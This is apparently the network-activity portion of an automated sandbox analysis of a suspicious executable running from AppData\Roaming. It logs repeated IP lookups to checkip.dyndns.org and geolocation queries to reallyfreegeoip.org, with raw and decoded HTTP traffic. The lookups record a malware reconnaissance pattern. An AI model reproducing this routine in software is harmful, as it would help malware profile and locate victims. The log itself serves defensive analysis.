                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 7b8fcdf319260874714b720069a8335e
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:14:28.806952953 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:28 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 7b8fcdf319260874714b720069a8335e
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:14:29.624443054 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:14:29.779253006 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:29 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: a4a9de5aff68a7ce983d6899eb7ac35b
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.2249169193.122.6.168803576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:14:31.535645008 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:14:32.377108097 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:32 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 4a2f505ff613db7d153c6be58078f8a4
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:14:32.590984106 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:32 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 4a2f505ff613db7d153c6be58078f8a4
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.2249171193.122.6.168803576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:14:33.209093094 CET127OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Oct 30, 2024 08:14:34.056884050 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:33 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 07ba76abce748b1fa19e310865c76855
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:14:34.270807981 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:33 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 07ba76abce748b1fa19e310865c76855
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.2249173132.226.247.73803576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:14:34.921821117 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:14:35.790563107 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:35 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 962a469f6c3987094932bc995566fe76
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:14:35.998841047 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:35 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 962a469f6c3987094932bc995566fe76
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.2249175193.122.6.168803576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:14:36.781786919 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:14:37.633635044 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:37 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 303b289934e8ebc63392404bc6047667
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:14:37.842832088 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:37 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 303b289934e8ebc63392404bc6047667
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.2249177132.226.247.73803576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:14:38.458283901 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:14:39.319819927 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:39 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 2c75d4d564598c2660ac5097b897149d
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:14:39.530790091 CET323INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:39 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          X-Request-ID: 2c75d4d564598c2660ac5097b897149d
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.2249179132.226.8.169803576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:14:40.154040098 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:14:41.042052031 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:40 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.2249181132.226.8.169803576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:14:42.806113005 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:14:43.722707987 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:43 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>


                                                                                                          HTTPS Proxied Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.2249167188.114.96.34433576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:14:29 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:14:29 UTC885INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:29 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20492
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1mSEHw3%2FfftL7vRDWdXrmG9hqGHzl1uDtzz4r7I58PL9Y1WCScOZvY82NtEls9%2FziNDBWv1T4tg3fym9gHKguVK%2FiVao75xNbdM7az0s7tXcN3Q0iyOcromgCeYwnfnXcgxwaoTO"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da99bd68880476c-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2729500&cwnd=251&unsent_bytes=0&cid=56b1d37744bddae2&ts=216&x=0"
                                                                                                          2024-10-30 07:14:29 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.2249168188.114.96.34433576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:14:30 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:14:30 UTC887INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:30 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20493
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hp2ZqtPryWAXOKOyn%2Fv0kclOsfpt2WEifGH4mYvlgKRPAsJhxtQWjkOXG5cwDkWy6FWZpl1Jvs2MOp0VfnT8wjIv1bhTsWD%2FDTjTwK5M5sE1%2BsGYVEmLEAEqptkAlng%2FwYesdPzp"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da99bdc7e852ff0-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1275&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2129411&cwnd=239&unsent_bytes=0&cid=7a3166059c3ac1cd&ts=160&x=0"
                                                                                                          2024-10-30 07:14:30 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.2249170188.114.96.34433576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:14:33 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:14:33 UTC879INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:33 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20496
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KwFTeLBhQufXf5hTdXlclyZGWFqth87AIjiaFV3Tyf5SR5gJdl1F8tXDejGMhFG4a4s7GTvHb31Hr7jSjo3GN9C2d8IDQGzT7T0TVkPCfkRZL2TJm4CDQnkyF8CdzdBsNeJNuE0M"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da99beccf49e9a0-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1298&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2154761&cwnd=251&unsent_bytes=0&cid=5634754944486b8a&ts=152&x=0"
                                                                                                          2024-10-30 07:14:33 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.2249172188.114.96.34433576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:14:34 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:14:34 UTC885INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:34 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
